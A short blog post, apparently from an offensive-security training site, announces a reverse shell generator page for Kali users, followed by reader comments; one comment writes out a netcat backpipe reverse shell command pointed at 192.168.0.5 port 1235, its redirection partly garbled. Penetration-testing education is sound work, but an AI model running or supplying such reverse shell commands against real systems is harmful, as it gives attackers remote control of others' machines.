New Reverse Shell Generator Page
Rowbot’s Reverse Shell Generator (offsecnewbie.com)
I’ve added a reverse shell generator page as to make it as quick and easy to put in the IP and port to all the reverse shells. Then just click copy to copy it to your clipboard.
Bookmark it and add it to your browser toolbar in Kali for easy access.
If you have any other reverse shell commands you’d like me to add, let me know.
made you look huh … that was nice one
hi there,
maybe you can make this small change. instead of this
“mknod backpipe p && nc 192.168.0.5 1235 0backpipe”
put this
“rm backpipe; mknod backpipe p && nc 192.168.0.5 1235 0backpipe”